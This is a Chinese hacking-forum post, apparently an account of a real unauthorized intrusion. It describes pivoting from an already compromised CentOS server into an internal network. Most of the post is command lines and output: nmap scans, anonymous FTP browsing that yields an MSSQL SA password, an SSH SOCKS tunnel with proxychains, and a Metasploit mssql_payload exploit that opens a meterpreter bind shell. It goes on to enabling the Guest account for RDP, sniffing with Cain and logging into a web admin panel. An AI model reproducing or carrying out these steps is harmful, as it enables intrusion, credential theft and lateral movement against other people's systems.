切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
377 代理之路[复制链接]
发表于 2012-12-20 01:08:09 | 显示全部楼层 |!read_mode!
继续   376 一次检测Rootkit的肉鸡   核心思想核 353 Metasploit 跨路由器访问  一样


双网卡 游有


  1. [root@viewjpkc ~]# ifconfig | grep eth
  2. eth0      Link encap:Ethernet  HWaddr 00:21:5E:C8:F2:EC  
  3. eth1      Link encap:Ethernet  HWaddr 00:21:5E:C8:F2:EE  
  4. [root@viewjpkc ~]#
复制代码
CENTOS的 如  375 ETTERCAP 配合ROOTKIT 持续ARP  修谈了1天 数据包200多G 什么都没ARP到 还要硬盘霸气


  1. [root@viewjpkc ~]# fdisk -l

  2. Disk /dev/sda: 1048.5 GB, 1048576000000 bytes
  3. 255 heads, 63 sectors/track, 127482 cylinders
  4. Units = cylinders of 16065 * 512 = 8225280 bytes

  5. Disk /dev/sda doesn't contain a valid partition table

  6. Disk /dev/sdb: 1048.5 GB, 1048576000000 bytes
  7. 255 heads, 63 sectors/track, 127482 cylinders
  8. Units = cylinders of 16065 * 512 = 8225280 bytes

  9. Disk /dev/sdb doesn't contain a valid partition table

  10. Disk /dev/sdc: 1048.5 GB, 1048576000000 bytes
  11. 255 heads, 63 sectors/track, 127482 cylinders
  12. Units = cylinders of 16065 * 512 = 8225280 bytes

  13. Disk /dev/sdc doesn't contain a valid partition table

  14. Disk /dev/sdd: 1048.5 GB, 1048576000000 bytes
  15. 255 heads, 63 sectors/track, 127482 cylinders
  16. Units = cylinders of 16065 * 512 = 8225280 bytes

  17. Disk /dev/sdd doesn't contain a valid partition table

  18. Disk /dev/sde: 145.9 GB, 145999527936 bytes
  19. 255 heads, 63 sectors/track, 17750 cylinders
  20. Units = cylinders of 16065 * 512 = 8225280 bytes

  21.    Device Boot      Start         End      Blocks   Id  System
  22. /dev/sde1   *           1        1274    10233373+  83  Linux
  23. /dev/sde2            1275        7648    51199155   83  Linux
  24. /dev/sde3            7649       14022    51199155   83  Linux
  25. /dev/sde4           14023       17750    29945160    5  Extended
  26. /dev/sde5           14023       16061    16378236   82  Linux swap / Solaris

  27. Disk /dev/dm-0: 1048.5 GB, 1048576000000 bytes
  28. 255 heads, 63 sectors/track, 127482 cylinders
  29. Units = cylinders of 16065 * 512 = 8225280 bytes

  30. Disk /dev/dm-0 doesn't contain a valid partition table
  31. [root@viewjpkc ~]# df -h
  32. �ļ�ϵͳ              ����  ���� ���� ����% ���ص
  33. /dev/sde3              48G   26G   19G  58% /
  34. /dev/sde2              48G  1.7G   44G   4% /var
  35. /dev/sde1             9.5G  160M  8.9G   2% /boot
  36. tmpfs                 5.9G     0  5.9G   0% /dev/shm
  37. /dev/dm-0             962G  4.2G  909G   1% /usr/local/Easiware/UploadFiles
  38. [root@viewjpkc ~]#
复制代码


先装NMAP吧


  1. [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/nmap-6.01-1.i386.rpm
  2. [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/zenmap-6.01-1.noarch.rpm
  3. [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/ncat-6.01-1.i386.rpm
  4. [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/nping-0.6.01-1.i386.rpm
复制代码

  1. [root@viewjpkc ~]# nmap -v

  2. Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-28 11:16 CST
  3. Read data files from: /usr/bin/../share/nmap
  4. WARNING: No targets were specified, so 0 hosts scanned.
  5. Nmap done: 0 IP addresses (0 hosts up) scanned in 0.05 seconds
  6.            Raw packets sent: 0 (0B) | Rcvd: 0 (0B)
  7. [root@viewjpkc ~]#
复制代码


先扫下其中一个网卡


  1. [root@viewjpkc tmp]# nmap -sT -sV -p 445 256.256.0.0/24 --open >> 123456
  2. [root@viewjpkc tmp]# cat 123456
复制代码


发现256.256.0.11存活 还游另外一个存在MS08-67漏洞 不过系统版本选错 溢出445挂了




  1. Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-28 11:18 CST
  2. Nmap scan report for 256.256.0.11
  3. Host is up (0.00011s latency).
  4. PORT    STATE SERVICE      VERSION
  5. 445/tcp open  microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
  6. MAC Address: 00:1B:78:CF:B4:94 (Hewlett-Packard Company)
  7. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
复制代码


继续扫描


  1. [root@viewjpkc tmp]# nmap -sT -A -O -sV -T5 256.256.0.17 -vv
  2. 23/tcp   open  telnet?
  3. 25/tcp   open  smtp?
  4. 80/tcp   open  http          Microsoft IIS httpd 6.0
  5. 110/tcp  open  pop3?
  6. 119/tcp  open  nntp?
  7. 135/tcp  open  msrpc         Microsoft Windows RPC
  8. 139/tcp  open  netbios-ssn
  9. 445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
  10. 808/tcp  open  http-proxy    CCProxy http proxy (unauthorized)
  11. 1028/tcp open  msrpc         Microsoft Windows RPC
  12. 1029/tcp open  msrpc         Microsoft Windows RPC
  13. 1031/tcp open  msrpc         Microsoft Windows RPC
  14. 1032/tcp open  msrpc         Microsoft Windows RPC
  15. 1080/tcp open  socks5        (Username/password authentication required)
  16. 1433/tcp open  ms-sql-s      Microsoft SQL Server 2000 8.00.2039; SP4
  17. 2121/tcp open  ccproxy-ftp?
  18. 3389/tcp open  ms-wbt-server Microsoft Terminal Service
  19. 5001/tcp open  ovm-manager   Oracle VM Manager
  20. 7777/tcp open  ftp           Microsoft ftpd
  21. 8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
  22. 8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
  23. 8888/tcp open  ftp           Microsoft ftpd
  24. 9999/tcp open  ftp           Microsoft ftpd
复制代码


扫到的服务如下 发现不能访问


  1. brk<~> $ nc -vv 256.256.0.17 445
  2. nc: connect to 256.256.0.17 port 445 (tcp) failed: No route to host
复制代码


先做个代理


  1. brk<~> $ ssh -qTfnN -D 10086 root@58.45.191.83
  2. root@58.45.191.83's password:
复制代码


编辑代理工具
  1. brk<~> $ sudo nano /etc/proxychains.conf
复制代码





  1. socks5  127.0.0.1 10086
复制代码


测试


  1. brk<~> $ proxychains nc -vv 256.256.0.17 445
  2. ProxyChains-3.1 (http://proxychains.sf.net)
  3. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.11:445-<><>-OK
  4. Connection to 256.256.0.11 445 port [tcp/microsoft-ds] succeeded!
复制代码


发现开了很多FTP 服务器????
8888/tcp open ftp Microsoft ftpd
9999/tcp open ftp Microsoft ftpd
7777/tcp open ftp Microsoft ftpd


  1. [root@viewjpkc tmp]# nmap -sV -sC -p 8888,9999,7777 256.256.0.17

  2. Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-28 11:41 CST
  3. Nmap scan report for 256.256.0.17
  4. Host is up (0.00014s latency).
  5. PORT     STATE SERVICE VERSION
  6. 7777/tcp open  ftp     Microsoft ftpd
  7. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  8. | 07-30-08  12:26AM                  106 _sfx_manifest_
  9. | 01-22-10  08:59PM              6914959 apache-tomcat-6.0.24.exe
  10. | 07-08-10  09:09PM       <DIR>          change
  11. | 07-17-10  03:45AM       <DIR>          data
  12. | 03-19-10  10:15PM            242743296 dotnetfx35.exe
  13. | 02-18-05  09:33AM                 9264 DVDgif01.jpg
  14. | 07-08-10  09:09PM       <DIR>          HPBBS
  15. | 01-11-11  03:47PM       <DIR>          ikudisk
  16. | 12-27-09  02:15AM             76236184 jdk-6u10-rc2-bin-b32-windows-i586-p-12_sep_2008.exe
  17. | 03-26-10  09:50PM             21161617 navicat8_lite_cs.exe
  18. | 07-09-10  10:08PM                 1346 RecoverySummary.rtf
  19. | 03-28-10  01:52AM       <DIR>          reg
  20. | 06-09-10  12:18AM       <DIR>          SQL_PERSONAL
  21. | 12-27-09  02:11AM            327057853 SQL_PERSONAL.rar
  22. | 06-09-10  12:18AM       <DIR>          SQL2000-KB884525-SP4-x86-CHS
  23. | 12-27-09  02:15AM             69796743 SQL2000-KB884525-SP4-x86-CHS.zip
  24. | 06-09-10  12:23AM       <DIR>          SQL2KSP4
  25. | 03-26-10  08:37PM       <DIR>          TCCN-3.1.3-Trinity4666
  26. | 03-19-10  10:19PM            185841508 TCCN-3.1.3-Trinity4666.exe
  27. | 11-28-12  04:56AM       <DIR>          TDDOWNLOAD
  28. |_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
  29. 8888/tcp open  ftp     Microsoft ftpd
  30. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  31. | 07-20-10  03:21PM       <DIR>          Downloads
  32. | 07-09-10  09:14PM       <DIR>          home
  33. | 07-09-10  09:14PM       <DIR>          Intel
  34. | 12-10-10  09:52PM       <DIR>          LOSTFILE
  35. | 05-26-11  08:55PM       <DIR>          Program Files
  36. | 01-06-11  04:03PM       <DIR>          software
  37. | 07-08-10  09:17PM       <DIR>          ss
  38. | 07-09-10  09:29PM       <DIR>          tlbbs
  39. | 09-19-11  08:25PM       <DIR>          tlchat
  40. | 07-09-10  09:29PM       <DIR>          TLhome
  41. | 05-26-11  09:06PM       <DIR>          vss
  42. |_01-03-11  01:06AM       <DIR>          \xD0\xC2\xBD\xA8\xCE\xC4\xBC\xFE\xBC\xD0
  43. 9999/tcp open  ftp     Microsoft ftpd
  44. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  45. | 07-24-10  02:31PM               370211 [NeHe.OpenGL.Tutorial][\xD6\xD0\xCE\xC4\xB0\xE6.CKER\xB7\xAD\xD2\xEB].chm
  46. | 07-25-10  06:13AM            216514560 [\xC8\xFD\xCE\xAC\xD3\xCE\xCF\xB7\xC9\xE8\xBC\xC6\xCA\xA6\xB1\xA6\xB5\xE4]\xD1\xA7OpenGL\xB1\xE03D\xD3\xCE\xCF\xB7.ISO
  47. | 07-19-10  04:38PM           2747414528 [\xCB\xE3\xB7\xA8\xC9\xE8\xBC\xC6\xD3\xEB\xB7\xD6\xCE\xF6-30\xBD\xB2]-\xD6\xD0\xBF\xC6\xD4\xBA.iso
  48. | 09-17-10  04:46PM               387721 3Dmax8.0\xD7\xA2\xB2\xE1\xBB\xFA.rar.RAR
  49. | 09-17-10  04:55PM             76187924 3DMAX8\xBC\xF2\xCC\xE5\xD6\xD0\xCE\xC4\xB0\xE6\xC3\xE2\xB0\xB2\xD7\xB0\xB0\xE6\xA1\xA23D MAX 9.0 \xBC\xB03D MAX 6.0 \xD5\xFD\xCA\xBD\xB0\xE6.RAR
  50. | 11-13-10  11:09PM                25945 815325_1289561070m0y2.rar
  51. | 07-19-10  01:49PM       <DIR>          cf
  52. | 06-25-10  01:15AM       <DIR>          cygwin
  53. | 06-25-10  09:55PM           1497624963 cygwin.rar
  54. | 07-17-10  03:45AM       <DIR>          data
  55. | 07-01-10  04:36PM             25077248 DG_2010V33_1112.exe
  56. | 07-01-10  04:39PM              5745328 drivethelife2010_setup.exe
  57. | 07-23-10  02:32PM              9573001 DTLite4356-0091.zip
  58. | 07-24-10  03:20PM            581591568 DXSDK_Feb10.exe
  59. | 07-08-10  11:38AM             18875776 easyrecovery_setup.exe
  60. | 05-02-10  05:02PM              9146584 FirefoxChinaEdition-latest.exe
  61. | 07-09-10  06:40AM       <DIR>          HPBBS
  62. | 07-01-10  08:00PM            690401280 ibm_util_sguide_8.13.49y0225_anyos_32-64.iso
  63. | 08-07-10  05:47PM              5214984 icbc_netbank_client_controls.exe
  64. | 04-01-10  01:35AM             43637663 kof2005_766_1220_setup.rar
  65. |_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
  66. MAC Address: 00:21:85:C1:45:B8 (Micro-star Int'l Co.)
  67. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  68. Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  69. Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
  70. [root@viewjpkc tmp]#
复制代码


你妈比 都能匿名访问 用FIREFOX的插件 做代理 访问




打开 好多东西




找了半天找到个SA密码




哈哈哈

启动MSF代理 不用代理不能链接


  1. brk</pen/msf3> $ sudo proxychains ./msfconsole

  2. msf > use exploit/windows/mssql/mssql_payload
  3. msf  exploit(mssql_payload) > set RHOST 256.256.0.17
  4. RHOST => 256.256.0.17
  5. msf  exploit(mssql_payload) > set PASSWORD pwd@123
  6. PASSWORD => pwd@123
  7. msf  exploit(mssql_payload) >
复制代码

是内网 所以要BINDSHELL


  1. msf  exploit(mssql_payload) > set PAYLOAD windows/meterpreter/bind_tcp
  2. PAYLOAD => windows/meterpreter/bind_tcp
  3. msf  exploit(mssql_payload) > set LPORT 45214
  4. LPORT => 45214
  5. msf  exploit(mssql_payload) > set METHOD old
  6. METHOD => old
  7. msf  exploit(mssql_payload) > exploit
  8. msf  exploit(mssql_payload) > exploit

  9. [*] Started bind handler
  10. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:1433-|S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<><>-OK
  11. <--timeout
  12. [*] Warning: This module will leave yByNNKkq.exe in the SQL Server %TEMP% directory
  13. [*] Writing the debug.com loader to the disk...
  14. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  15. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  16. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  17. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  18. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  19. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  20. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  21. [*] Converting the debug script to an executable...
  22. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  23. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-[*] Uploading the payload, please be patient...
  24. <--timeout
  25. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  26. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  27. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  28. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  29. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  30. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  31. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  32. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  33. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  34. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  35. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  36. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  37. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  38. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  39. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  40. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  41. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  42. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  43. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  44. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  45. [*] Converting the encoded payload...
  46. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  47. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  48. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  49. [*] Executing the payload...
  50. |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<><>-OK
  51. [*] Sending stage (752128 bytes) to 256.256.0.17
  52. [*] Meterpreter session 1 opened (127.0.0.1:33451 -> 127.0.0.1:10086) at 2012-11-28 13:55:14 +0800

  53. meterpreter >
复制代码

获得SHELL 他开了3389 添加个ID进去 我吧GUEST激活了 直接登录 由于是用代理 所以不能进行端口转发


  1. brk</pen/msf3> $ proxychains rdesktop 256.256.0.17 -r disk:MyDisk=/home/brk/ -g 1200*1000 -u guest -p 123456
复制代码

装了CAIN 修谈到了点HTTP的东西



发现是内网的 用代理 brk $ proxychains w3m 256.256.0.13/xxxx登录后台

登录成功


未完 等待更新



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-12-14 09:54

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部